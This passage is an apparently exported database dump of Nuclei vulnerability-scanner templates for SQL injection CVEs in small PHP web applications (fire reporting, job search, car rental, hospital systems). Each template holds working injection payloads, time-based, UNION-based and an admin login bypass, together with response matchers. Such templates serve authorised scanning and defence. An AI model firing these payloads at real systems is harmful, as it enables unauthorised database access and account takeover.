4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950", "hash": "7eed65e9006ec3a0799de7d5a4c5e58a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308534" }, "name": "CVE-2022-31980.yaml", "content": "id: CVE-2022-31980\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31980\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31980\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Control Teams\")'\n condition: and\n# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950", "hash": "5378637b2218784e5f64b6e29b339e21", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308535" }, "name": "CVE-2022-31981.yaml", "content": "id: CVE-2022-31981\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31981\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31981\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Control Teams\")'\n condition: and\n# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950", "hash": "cde93c80d1227f7b74ca16558eeae58c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308536" }, "name": "CVE-2022-31982.yaml", "content": "id: CVE-2022-31982\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31982\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31982\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Request Detail\")'\n condition: and\n# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950", "hash": "9293b2109f097ebc696aa286b2c2b7a7", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308537" }, "name": "CVE-2022-31983.yaml", "content": "id: CVE-2022-31983\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31983\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31983\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"Request Detail\")'\n condition: and\n# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950", "hash": "3b473c28e2d72f2a564245d754ff6584", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308538" }, "name": "CVE-2022-31984.yaml", "content": "id: CVE-2022-31984\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31984\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31984\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950", "hash": "04b23d2b0d3066fbf97aec15cc0f6393", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308539" }, "name": "CVE-2022-32007.yaml", "content": "id: CVE-2022-32007\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32007\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32007\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user_email={{username}}&user_pass={{password}}&btnLogin=\n - |\n GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a004830460221008ad23239cd7dd2a9bf0d16fa365774f1eed66f8132c22cd8754914207b1bfa6b022100a67736c94d6df0e5a51bf0750a3aa7dce46543398696dde083bb55fdffba091f:922c64590222798bb761d5b6d8e72950", "hash": "8d681265b50743608caa4ecfed92552d", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853a" }, "name": "CVE-2022-32015.yaml", "content": "id: CVE-2022-32015\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32015\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32015\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950", "hash": "8119bc289f8fc503b2f7f919dab41f0e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853b" }, "name": "CVE-2022-32018.yaml", "content": "id: CVE-2022-32018\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32018\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32018\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950", "hash": "bad286fb11adc5440a4a7ffde527cd2d", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853c" }, "name": "CVE-2022-32022.yaml", "content": "id: CVE-2022-32022\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32022\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32022\n cwe-id: CWE-89\n epss-score: 0.00897\n epss-percentile: 0.80882\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin'+or+'1'%3D'1'%23&password=admin\n - |\n GET /admin/index.php?page=home HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Welcome back Administrator!'\n - 'action=logout'\n - 'Manage Account'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950", "hash": "84586aeace3f3d74cc1296627a38f9d9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853d" }, "name": "CVE-2022-32024.yaml", "content": "id: CVE-2022-32024\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32024\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32024\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950", "hash": "4dfa7fbba8102d5608e55b781ed1a9cb", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853e" }, "name": "CVE-2022-32025.yaml", "content": "id: CVE-2022-32025\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32025\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32025\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}%23&password={{password}}\n - |\n GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950", "hash": "75d97b083274e8d9c8fcaf3b183eae1b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853f" }, "name": "CVE-2022-32026.yaml", "content": "id: CVE-2022-32026\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32028\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32026\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950", "hash": "f17ff1381c1f04048b3d61b39e84d57a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308540" }, "name": "CVE-2022-32028.yaml", "content": "id: CVE-2022-32028\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32028\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32028\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950", "hash": "ed124ed66476d6bd2a15c6b59d63ddbe", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308541" }, "name": "CVE-2022-32094.yaml", "content": "id: CVE-2022-32094\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: critical\n description: |\n Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32094\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: 